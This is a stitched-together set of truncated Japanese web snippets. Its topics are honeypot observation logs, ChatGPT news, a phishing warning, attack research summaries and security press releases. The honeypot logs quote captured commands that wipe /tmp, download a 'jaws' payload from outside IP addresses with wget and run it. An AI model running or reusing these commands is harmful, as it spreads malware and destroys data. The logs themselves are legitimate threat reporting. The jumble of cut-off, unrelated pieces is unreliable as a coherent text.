ハニーポット(仮) 観測記録 2023/04/02分です。 特徴 共通 Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス GPONルータの脆弱性を狙うアクセス NetGear製品の脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス Spring Bootの脆弱性を狙うアクセス curlによるスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 45.81.243.34/jaws; sh /tmp/jaws Location

ハニーポット(仮) 観測記録 2023/04/03分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 /.envへのスキャン行為 /.gitへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス zgrabによるスキャン行為 WordPress Pluginへのスキャン行為 phpMyAdminへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 107.6.255.132/jaws; sh /tmp/jaws cd /tmp; rm -rf *; wget 204.44.109.117/jaws; sh /tmp/jaws cd /tmp;

ブドウ糖はダメージ物質を生み出す 脳の燃料の1つであるブドウ糖は、多くの点でガソリンに似ている。このブドウ糖は、私たちが摂取する炭水化物を介して血液中に入る。 炭水化物を頻繁に摂っていると、ブドウ糖が脳の主要なエネルギー源となる。そしてミトコンドリアは細胞内でこのブドウ糖から、酸素を使った複雑な燃焼メカニズムによってエネルギーをつくりだす。このプロセスは「好気性代謝」と呼ばれ、私たちが知るとおり、それなしで生きることは不可能だ。だがガソリンと同じく、代謝は高い代償を払う。つまり排気ガスだ。 ブドウ糖による代謝の副産物の1つは「活性酸素」、あるいはフリーラジカルと呼ばれる物質だ。こうしたダメージ物質が生まれるのは正常な作用であり、生きていく上で避けられない側面でもある。 理想的な状態であれば、私たちにはこの有害なフリーラジカルを除去する力がある。だがフリーラジカルがどんどん増えると、それを除

OpenAIが2022年11月に公開した人工知能チャットボット「ChatGPT」が話題だ。機械学習機能を備え、あらゆる質問に答えられるようになったAIがあれば、人間はもはや不要の存在か。『超「超」勉強法』を刊行した野口悠紀雄さんは「実際に試して確信しましたが、AI時代に人間が不要になることはありません。むしろ、人間が生み出す“良い質問”が決定的に重要になります」という──。（第3回／全7回） ※本稿は、野口悠紀雄『超「超」勉強法』（プレジデント社）の一部を再編集したものです。 AI時代には勉強する必要はなくなるか AI（人工知能）の力で、検索がますます容易になり、かつ強力になっています。 スマートフォンに向かって質問するだけで、答えを出してくれます。また、セマンティック検索が可能になりつつあります。これは、ユーザーの質問が曖昧あいまいであっても、検索意図を検索エンジンが推測し、ユーザーが求

ネットショップ作成サービスを提供するBASEは4月6日、OpenAIのChatGPTを活用した新機能「BASE AI アシスタント」の提供を開始したと発表した。商品説明文や顧客に送付するメールマガジンの文章、SNSへ投稿する文章の作成をサポートする。 第1弾として、商品説明文の説明をサポートする機能を提供する。入力した商品名から、商品の特徴や訴求内容を含む400文字前後の商品説明文を自動で生成する。商品名だけでなく、商品の特徴やキーワードを入力することで、より意図に沿った商品説明文を作成することができる。 関連記事 東大松尾教授が答える、ChatGPTとは何なのか？　一問一答 国内におけるAIの権威である東京大学の松尾豊教授は、ChatGPTをどう見ているのか？　ChatGPTは、一時的なトレンドか技術的転換点か、AI研究者から見てChatGPTは？　日本もLLMを作ったほうがいいのか？　

総務省は、4月5日に「住民税等お支払いサイト」といったフィッシングサイトへ誘導するSMSへの注意喚起を行った。 総務省をかたり「【総務省】重要なお知らせ、必ずお読みください」といったSMSが届き、個人情報やクレジットカード情報、Vプリカ発行コード番号などの入力を促すという。同省ではアクセスや個人情報を入力せず、各都道府県警察に設けている「フィッシング110番」からフィッシング報告専用窓口に通報するよう呼び掛けている。 また、フィッシング対策協議会ではAndroidスマートフォンなどで「http://●●●●.duckdns.org/」などのURLを表示すると不正アプリのインストールへ誘導される場合がある事例も確認。万が一インストールした可能性がある場合はアプリをアンインストールする、Google Playプロテクトでチェックするなどの対処を推奨している。 関連記事 詳しい人でもだまされる？

心理学の研究では多くの被験者を集め、実験結果にバイアスがかからないように慎重な作業を行っています。しかし、心理学研究の被験者は参加報酬や講義の単位など、何らかの動機を持って応募してきた人々であるため、「心理学研究に応募する被験者の傾向」が存在する可能性もあります。そこでポーランドの研究チームは、心理学研究に応募する被験者の傾向について調査を行いました。 Self-selection biases in psychological studies: Personality and affective disorders are prevalent among participants | PLOS ONE https://doi.org/10.1371/journal.pone.0281046 People with personality disorders are more likely

Chat（チャット）GPTのGPT-4はGPT-3と違い、格段に性能が向上！何ができるのか解説 連日メディアを騒がせているChat（チャット）GPT。これまで使われていたのはGPT-3、あるいはGPT-3.5でしたが、最新のモデルであるGPT-4（ジーピーティー・フォー）が公開され、その性能の向上に多くの識者たちが驚きの声を挙げています。 東大の太田邦史理事・副学長は、東大のポータルサイトの中で「人類はこの数ヶ月でルビコン川を渡ってしまったかもしれない」とまで語りました。 MITメディアラボ元所長でテクノロジーに造詣が深い伊藤穰一氏はYouTube動画「【GPTと人間の共存する未来】Chat-GPTの解説や活用方法、AIを使った教育、web3とGPTの新たな関係性などを解説します」の中で、ChatGPTの頭脳のレベルについて「GPT3っていうのはまあまあ頭いい小学生っていう感じでGPT-4

はじめに 個人的に主要言語と思う8言語＆スクリプト（python, JavaScript, Rust, Haskell, C++, C#, bash, PowerShell)のチートシートです インデントのために全角空白を含んでます。コピペする場合は気を付けて下さい ChatGPT(GPT-4)に書かせたコードなので一部変なコードがあるかもしれません 動かない場合はChatGPTにコードと一緒に"＜プログラミング名＞で＜大分類名＞の＜小分類名＞をやろうと思うんだけど、このコードを修正して。"的なことを書けば大抵の場合修正してくれます チートシート スプレッドシート版（こちらのほうが見やすいです） 記事版(中身はスプレッドシート版と同じです) 大分類 小分類 python JavaScript Rust Haskell C++ C# bash PowerShell

Google、「Nest Secure」「Dropcam」を 2024 年 4 月 7 日（日）でサポート終了 既存の「Nest Secure」「Dropcam」ユーザーには救済措置を用意 「Works with Nest」も 2023 年 9 月 28 日（木）でサポート終了 Google は 2023 年 4 月 7 日（金）、2017 年に海外で発売したホームセキュリティシステム「Nest Secure」と、2014 年に Google 傘下 Nest によって買収された Dropcam のネットワークカメラ「Dropcam」のサポートを、一年後の 2024 年 4 月 7 日（日）で終了すると発表しました。 「Nest Secure」は現在、「Nest」アプリから制御できるようになっていますが、2024 年 4 月 8 日（月）以降はすべての機能ができなくなり、「Nest」アプリか

Linuxディストリビューションにはサポート期間の長いものやローリングリリースを採用しているものなど多様な種類が存在しています。そんな数あるディストリビューションの中でも、システムのコア部分が編集不可能で不変性を担保している8つのディストリビューションが海外メディアのIt’s FOSSによって紹介されています。 8 Immutable Linux Distributions for Those Looking to Embrace the Future https://itsfoss.com/immutable-linux-distros/ 以下に挙げる8種類のディストリビューションは、コア部分を読み取り専用にすることでシステムの不変性を確保しています。不変性の確保には、「セキュリティ強化」というメリットの他、「どの環境でもシステム構成が同一なため、コンテナ技術を用いたアプリケーションの配

日本マイクロソフトは2023年3月7日、サイバーセキュリティをテーマにしたオンラインイベント「Security Forum 2023 Online」を開催した。同社は同イベントでID管理や端末管理、クラウドセキュリティ、運用の自動化といったセキュリティソリューションを紹介し、「新たなセキュリティの姿」を示した。 本稿は同イベントの基調講演「社会全体のサイバーハイジーンをめざして」を紹介する。 Microsoftが示す「セキュリティへの姿勢」　守りのための武器は 日本マイクロソフトの河野省二氏（技術統括室　チーフセキュリティオフィサー）は講演の冒頭で「新型コロナウイルス感染症（COVID-19）という脅威の中で、私たちはウイルスを人にうつさずに生活できる社会を目指している。サイバー空間も同様で、ウイルスを使ったさまざまな攻撃が仕掛けられても影響を受けない環境を作ることが大切だ。脅威インテリジ

組織のセキュリティ対策, 脅威情報 2023.3.10 ChatGPTにするのかしないのか？それは最近のサイバー界隈で頻繁にやり取りされる会話です。AIボットが社会を席巻しているのは当然です。MetaのFAIR、GoogleのLaMDA、IBMのWatson、MicrosoftのCortanaなど、さまざまな人工知能ボットが登場しています。Watsonといえば、もう10年以上前、2011年2月に人気番組「Jeopardy」でデビューしました。人工知能は新しい概念ではありません。新しいのは、ChatGPTが世界中の何百万人もの人が簡単に利用でき、多額の利用料も必要ないことです。しかし、サイバー脅威論者が攻撃を容易にするために利用する可能性があるため、直接的な脅威となり得る斬新なものとしても見られています。 エレガントなマルウェアライターか、それとも単にコンセプトの乏しいコードか？ ChatG

「IT訴訟 徹底解説」連載の細川氏が明かす、サプライチェーンリスクから組織を守る「契約」の極意：日本のIT課題の集大成「サプライチェーン攻撃」に立ち向かう術はあるのか（3） サプライチェーン攻撃の対策は自社のセキュリティ体制の構築だけでは不十分だ。パートナー企業のセキュリティ対策がしっかりとしていないと、そこを足掛かりにされ、被害に遭うことがある。そこで有効となるのが、提携先とのセキュリティに関する「契約」だ。本稿では、契約や法律の専門家による講演から、具体的なサイバーセキュリティ対応契約のポイントを探る。発注元はもちろん、発注先となる企業は、「こういうことが求められるようになる」という参考にしてほしい。 2023年2月28日に開催された「ITmedia Security Week 2023 春」の「サプライチェーン攻撃だけじゃない、新たな脅威」ゾーンにおいて、ITプロセスコンサルタントの

CloudSEKは、インフォスティーラマルウェアへのリンクを含んだYouTube動画が2022年11月から前月比で200～300％と劇的に増加していると指摘した。これらの動画は「Photoshop」「Premiere Pro」「Autodesk 3ds Max」「AutoCAD」といった有料の人気の高い製品の海賊版をダウンロードするためのチュートリアル動画を装ってユーザーを誘導し、そこからマルウェアに感染させる手法を取っている。 近年、AIで生成した動画を採用情報や教育教材、販促資料などで利用するケースが増えてきている。CloudSEKは「サイバー攻撃者もこれと同様にAIによって生成された偽のチュートリアル動画を使ってユーザーにマルウェア感染を促している」と説明している。 まずサイバー攻撃者は、AIを使って親しみやすい偽の海賊版ダウンロードチュートリアル動画を作成する。この動画には「Vid

ラテラルムーブメントは、「MITRE ATT&CK」フレームワークでも1つの戦術カテゴリーとしてまとめられています。サイバー攻撃者の間でこの戦術は頻繁に用いられるため、SOCオペレーターやセキュリティアナリストはこれに向けた適切な対策を講じる必要があります。 まずはラテラルムーブメントの具体例を幾つか紹介し、サイバー攻撃者がラテラルムーブメントで何を実現したいのかを探っていきたいと思います。 ケース1．リモートサービスの悪用 サイバー攻撃者がネットワーク内を行き来する際には、手っ取り早く今あるものを利用しようとします。外部公開しているリモートサービスとは異なり、内部ネットワークには脆弱（ぜいじゃく）なTelnetや簡易なパスワードが設定されているSSHやVNCをはじめとした、セキュリティ水準の低いリモートサービスが利用あるいは放置されているケースが存在します。 サイバー攻撃者はネットワーク

NECは、「SIP／IoT社会に対応したサイバー・フィジカル・セキュリティシンポジウム2022」の展示会において、稼働中のIoT機器へのサイバー攻撃によるプログラムの改ざんをリアルタイムに検知する「軽量プログラム真贋判定技術」を披露した。 NECは、2023年2月9日開催のイベント「SIP（戦略的イノベーション創造プログラム）／IoT社会に対応したサイバー・フィジカル・セキュリティシンポジウム2022」の展示会において、稼働中のIoT（モノのインターネット）機器へのサイバー攻撃によるプログラムの改ざんをリアルタイムに検知する「軽量プログラム真贋判定技術」を披露した。マイコンで制御されるIoT機器向けを想定した軽量のソリューションとして、既に商用展開している「軽量改ざん検知技術」と組み合わせての実用化を想定している。 NECの軽量プログラム真贋判定技術は、IoT機器のメモリ上の実行コードと実

組織のセキュリティ対策 2023.3.15 更新日：2023.3.16 最近まで、組織はエンドポイントデバイス、ネットワーク、電子メールなど、特定の攻撃対象領域を保護するための個別のサイバーセキュリティソリューションに依存していました。しかし、攻撃が複雑化するにつれ、このようなサイロ化したアプローチではもはや十分ではありません。今日の脅威の状況で成功するためには、組織は、すべてのベクトルにわたる攻撃を検知、防御、修復できる連結機能を必要としています。Trellix Extended Detection and Response (XDR)は、この重要な連結機能を提供するサイバーセキュリティへの革新的なアプローチです。新しいテクノロジーと同様に、XDRをめぐる誇大広告も多く、多くのベンダーがすぐに主導権を握ろうとします。事実と虚構を区別するためには、XDRの進化を理解し、その実現に必要な要素

Innovative Tech： このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。Twitter: ＠shiropen2 ドイツのUniversity Bochumとドイツの研究機関CISPA Helmholtz Center for Information Securityに所属する研究者らが発表した論文「Drone Security and the Mysterious Case of DJI’s DroneID」は、民生用ドローンの主要メーカーであるDJI社が販売するドローンの無線信号を解読して、ドローンと操縦者の位置を特定できる攻撃を提案した研究報告である。 悪意のある者がドローンを監視や違法物品の輸送に使用したり、空港上空などの飛行禁止区域に侵入して損害を与えた

Innovative Tech： このコーナーでは、テクノロジーの最新研究を紹介するWebメディア「Seamless」を主宰する山下裕毅氏が執筆。新規性の高い科学論文を山下氏がピックアップし、解説する。Twitter: ＠shiropen2 ドイツのResearch Center Trustworthy Data Science and Securityとルール大学ボーフム、オランダのラドバウド大学、米ノースイースタン大学、米ニューヨーク大学に所属する研究者らが発表した論文「Hope of Delivery: Extracting User Locations From Mobile Instant Messengers」は、WhatsAppなどのメッセンジャーアプリにおいて、メッセージを送信することで受信者の位置を特定できる攻撃を提案した研究報告である。 メッセンジャーアプリでは、送信し

メールに対するセキュリティ対策は喫緊の課題 情報処理推進機構（IPA）が2023年1月に公開した「情報セキュリティ10大脅威 2023」では、個人の脅威の1位が「フィッシングによる個人情報等の詐取」、会社など組織の脅威の7位が「ビジネスメール詐欺による金銭被害」だった。これらは、どちらも「電子メール（以下、メール）が悪用されることが多い」という共通項がある。 個人レベルでは、コミュニケーションツールとしてのメールを使う機会は減り、SNSやメッセージングサービスを利用することが増えている。だが、企業での利用についてはまだまだメールが中心だ。 TwoFiveの加瀬正樹氏（開発マネージャー）は、「企業と個人（B2C）、企業と企業（B2B）のコミュニケーションにおいては、依然としてメールの利用が多い。B2C、B2Bのメール環境では、『フィッシングメール』や『なりすましメール』などから利用者を守るセ

オンプレミスからクラウドへの移行をはじめ、ハイブリッドクラウド環境をシームレスに保護しながら、クラウドの利点を実現します。 詳しくはこちら

AI、RPA、データベース――3つの技術がサイバー攻撃を変え、「デジタル災害」を引き起こした背景とは：ITmedia Security Week 2023 春 2023年3月に開催された「ITmedia Security Week 2023 春」の「拡大するアタックサーフェス、“社内攻撃”を想定せよ」ゾーンにおいて、ニューリジェンセキュリティでCTO（最高技術責任者）を務める仲上竜太氏が「災害化するサイバー脅威とアタックサーフェス管理」と題して基調講演に登壇した。

企業を取り巻くITの状況が激変し、サイバー攻撃の手段が多様化・巧妙化する現在、「守る」だけのセキュリティ対策でインシデントを100％避けることはほぼ不可能だ。しかし万が一の事態になった際、ビジネスを停止させるわけにはいかない。 そこで「サイバーレジリエンス」という考え方に注目が集まっている。レジリエンスとは「回復力」を意味する。サイバー脅威の侵入を前提にし、被害を最小限にとどめて早期にシステムを復旧させることに焦点を当てたものだ。具体的には、サイバーセキュリティ対策を数段階に分割して「異常の検知」「攻撃の防御」「インシデントからの復旧」という一連の対応を素早く行うことでビジネスへの影響を抑える。 このサイバーレジリエンスの導入を早くから推奨したのが金融業界だった。G20諸国の金融当局を中心にしたバーゼル銀行監督委員会が、銀行の業務継続に関する7原則を2021年に公表。「混乱があっても重要な

TOP > プレスリリース一覧 > 「その他IT・インターネット （企業向け）」のプレスリリース > NTTコミュニケーションズ株式会社のプレスリリース > 【NTT Com】Microsoft 365導入企業へのサイバー攻撃に自動対処しセキュリティ技術... 【NTT Com】Microsoft 365導入企業へのサイバー攻撃に自動対処しセキュリティ技術者を支援、脅威への迅速な対応を可能にする 新サービスを開始 ～Microsoft Sentinelを活用した「マネージドSOAR」の提供開始～ NTTコミュニケーションズ株式会社(以下 NTT  Com)は、「Microsoft  365」(※1)の導入企業を対象に、サイバー攻撃への対処を自動化する法人向けサイバーセキュリティ対策サービス「マネージドSOAR」(以下 本サービス)を、2023年3月31日より提供開始します。 本サービスによ

経営者が認識すべき3原則に関して、国内外のサプライチェーンでつながる関係者におけるセキュリティの配慮、総合的なセキュリティ対策、社内外との積極的なコミュニケーションの重要性を追加、修正 指示5（サイバーセキュリティリスクに対応するための仕組みの構築）に関し、サイバーセキュリティリスクの識別やリスクの変化に対応した見直しおよびクラウドなどの最新技術とその留意点などについて追加、修正 指示8（インシデントによる被害に備えた復旧体制の整備）に関し、制御系も含めた業務復旧プロセスと整合性のとれた復旧計画や体制の整備およびサプライチェーンも含む実践的な演習の実施などについての追加、修正 指示9（ビジネスパートナーや委託先などを含めたサプライチェーン全体の対策および状況把握）に関し、サプライチェーンリスクの対応についての役割や責任の明確化、対策導入支援などサプライチェーン全体での方策の実行性を高めるこ